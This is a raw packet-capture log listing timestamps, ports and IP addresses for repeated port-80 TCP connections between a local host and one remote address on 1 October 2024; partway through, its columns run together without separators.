Oct 1, 2024 05:58:04.444998026 CEST | 49746 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:04.445091009 CEST | 49746 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:04.449800014 CEST | 80 | 49746 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:04.793356895 CEST | 49746 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:04.798464060 CEST | 80 | 49746 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:05.059312105 CEST | 80 | 49746 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:05.109177113 CEST | 49746 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:05.194909096 CEST | 80 | 49746 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:05.246362925 CEST | 49746 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:05.320677996 CEST | 49746 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:05.321309090 CEST | 49747 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:05.325973034 CEST | 80 | 49746 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:05.326076031 CEST | 49746 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:05.326122046 CEST | 80 | 49747 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:05.326205015 CEST | 49747 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:05.326306105 CEST | 49747 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:05.331095934 CEST | 80 | 49747 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:05.684154987 CEST | 49747 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:05.689249039 CEST | 80 | 49747 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:05.936384916 CEST | 80 | 49747 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:05.980875969 CEST | 49747 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.069905996 CEST | 80 | 49747 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.121387005 CEST | 49747 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.194133997 CEST | 49747 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.195365906 CEST | 49748 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.199577093 CEST | 80 | 49747 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.200371981 CEST | 80 | 49748 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.200534105 CEST | 49747 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.200567007 CEST | 49748 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.200678110 CEST | 49748 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.205585003 CEST | 80 | 49748 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.513179064 CEST | 49749 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.513267040 CEST | 49748 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.518203020 CEST | 80 | 49749 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.518733978 CEST | 49749 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.539853096 CEST | 49749 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.544734001 CEST | 80 | 49749 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.558437109 CEST | 80 | 49748 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.637101889 CEST | 80 | 49748 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.637211084 CEST | 49748 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.664069891 CEST | 49750 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.668999910 CEST | 80 | 49750 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.670677900 CEST | 49750 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.670768976 CEST | 49750 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.675611019 CEST | 80 | 49750 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.887140989 CEST | 49749 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:06.892113924 CEST | 80 | 49749 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:06.892288923 CEST | 80 | 49749 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.027745962 CEST | 49750 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.032676935 CEST | 80 | 49750 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.128727913 CEST | 80 | 49749 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.183963060 CEST | 49749 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.262018919 CEST | 80 | 49749 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.306022882 CEST | 80 | 49750 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.308875084 CEST | 49749 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.355751991 CEST | 49750 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.712416887 CEST | 80 | 49750 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.712651968 CEST | 80 | 49750 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.712727070 CEST | 49750 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.838233948 CEST | 49749 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.838294983 CEST | 49750 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.838871956 CEST | 49751 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.843599081 CEST | 80 | 49749 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.843656063 CEST | 49749 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.843765020 CEST | 80 | 49751 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.843884945 CEST | 49751 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.843995094 CEST | 49751 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.844047070 CEST | 80 | 49750 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:07.844089031 CEST | 49750 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:07.848881006 CEST | 80 | 49751 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:08.199726105 CEST | 49751 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:08.204755068 CEST | 80 | 49751 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:08.450721979 CEST | 80 | 49751 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:08.496840954 CEST | 49751 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:08.581130981 CEST | 80 | 49751 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:08.581432104 CEST | 49751 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:08.586690903 CEST | 80 | 49751 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:08.586782932 CEST | 49751 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:08.697076082 CEST | 49752 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:08.702006102 CEST | 80 | 49752 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:08.702078104 CEST | 49752 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:08.702168941 CEST | 49752 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:08.706937075 CEST | 80 | 49752 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:09.059089899 CEST | 49752 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.064162970 CEST | 80 | 49752 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:09.308294058 CEST | 80 | 49752 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:09.355742931 CEST | 49752 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.467139006 CEST | 80 | 49752 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:09.512034893 CEST | 49752 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.594707966 CEST | 49752 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.595401049 CEST | 49753 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.600001097 CEST | 80 | 49752 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:09.600233078 CEST | 80 | 49753 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:09.600292921 CEST | 49752 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.600323915 CEST | 49753 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.600423098 CEST | 49753 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.605214119 CEST | 80 | 49753 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:09.949620008 CEST | 49753 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:09.954674006 CEST | 80 | 49753 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:10.234700918 CEST | 80 | 49753 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:10.277626038 CEST | 49753 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:10.371033907 CEST | 80 | 49753 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:10.418292999 CEST | 49753 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:10.492075920 CEST | 49753 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:10.492669106 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:10.497415066 CEST | 80 | 49753 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:10.497442961 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:10.497474909 CEST | 49753 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:10.497524977 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:10.497617006 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:10.502330065 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:10.860961914 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:11.090171099 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:11.402621031 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:11.716557026 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:11.716583967 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:11.716593027 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:11.716646910 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:11.717211008 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:11.717236996 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:11.717395067 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:11.717459917 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:11.968523979 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.012001991 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.088193893 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.089061022 CEST | 49755 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.094192982 CEST | 80 | 49754 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.094239950 CEST | 49754 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.094954014 CEST | 80 | 49755 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.095010996 CEST | 49755 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.095127106 CEST | 49755 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.099831104 CEST | 80 | 49755 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.278203011 CEST | 49755 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.279309988 CEST | 49756 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.284131050 CEST | 80 | 49756 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.284188032 CEST | 49756 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.284267902 CEST | 49756 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.289010048 CEST | 80 | 49756 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.326396942 CEST | 80 | 49755 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.400727034 CEST | 49757 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.405591011 CEST | 80 | 49757 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.405649900 CEST | 49757 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.405754089 CEST | 49757 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.410438061 CEST | 80 | 49757 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.531393051 CEST | 80 | 49755 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.531445980 CEST | 49755 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.637193918 CEST | 49756 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.642195940 CEST | 80 | 49756 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.642355919 CEST | 80 | 49756 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.762170076 CEST | 49757 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:12.767309904 CEST | 80 | 49757 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.893801928 CEST | 80 | 49756 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:12.949505091 CEST | 49756 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.021226883 CEST | 80 | 49756 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.032345057 CEST | 80 | 49757 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.074506044 CEST | 49757 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.074517965 CEST | 49756 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.170599937 CEST | 80 | 49757 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.215460062 CEST | 49757 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.292711020 CEST | 49756 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.293734074 CEST | 49757 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.298141003 CEST | 80 | 49756 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.298223019 CEST | 49756 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.298854113 CEST | 80 | 49757 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.302695036 CEST | 49757 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.310997963 CEST | 49758 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.315912008 CEST | 80 | 49758 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.318705082 CEST | 49758 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.318944931 CEST | 49758 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.323790073 CEST | 80 | 49758 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.669439077 CEST | 49758 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:13.674472094 CEST | 80 | 49758 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.930177927 CEST | 80 | 49758 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:13.980959892 CEST | 49758 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.058001041 CEST | 80 | 49758 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:14.105849028 CEST | 49758 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.181145906 CEST | 49758 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.181602955 CEST | 49759 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.186441898 CEST | 80 | 49758 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:14.186490059 CEST | 80 | 49759 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:14.186568022 CEST | 49758 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.186614990 CEST | 49759 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.186798096 CEST | 49759 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.191752911 CEST | 80 | 49759 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:14.543723106 CEST | 49759 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.548886061 CEST | 80 | 49759 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:14.821423054 CEST | 80 | 49759 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:14.871500015 CEST | 49759 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:14.956448078 CEST | 80 | 49759 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:15.012015104 CEST | 49759 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:15.086764097 CEST | 49759 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:15.087219000 CEST | 49760 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:15.092003107 CEST | 80 | 49759 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:15.092118979 CEST | 80 | 49760 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:15.092194080 CEST | 49759 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:15.092228889 CEST | 49760 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:15.092366934 CEST | 49760 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:15.097155094 CEST | 80 | 49760 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:15.449654102 CEST | 49760 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:15.454725981 CEST | 80 | 49760 | 37.44.238.250 | 192.168.2.6
                                                          Oct 1, 2024 05:58:15.729161978 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:15.777651072 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.022836924 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.074517965 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.078463078 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.078697920 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.230186939 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.235481024 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.238722086 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.259543896 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.264461994 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.264545918 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.264693975 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.269484997 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.621526003 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.626461983 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.870326042 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.918239117 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.997250080 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.043241024 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.117175102 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.117851973 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.122360945 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.122436047 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.122600079 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.122667074 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.122769117 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.127526999 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.480849028 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.485883951 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.728247881 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.777679920 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.861299038 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.918291092 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.985301018 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.985965967 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.990499973 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.990695953 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.990796089 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.994716883 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.994857073 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.999968052 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.028846979 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.033950090 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.034706116 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.034775019 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.039632082 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.340296984 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.345462084 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.387531042 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.392573118 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.392626047 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.621289015 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.662667036 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.668250084 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.715164900 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.753087997 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.757580042 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.762923956 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.762978077 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.808911085 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.943171978 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.943849087 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.948565960 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.948636055 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.948683977 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.948743105 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.948857069 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.953622103 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.293462038 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.298458099 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.556365967 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.605741024 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.687680006 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.730741024 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.961355925 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.966506958 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.966603041 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.966725111 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.971467018 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.324604034 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.329641104 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.581358910 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.621380091 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.709384918 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.762032032 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.834472895 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.835835934 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.836507082 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.840846062 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.841466904 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.841676950 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.841722965 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.841829062 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.846991062 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.199671984 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.204862118 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.451883078 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.496398926 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.581860065 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.621402025 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.696191072 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.701107979 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.701212883 CEST4976880192.168.2.637.44.238.250
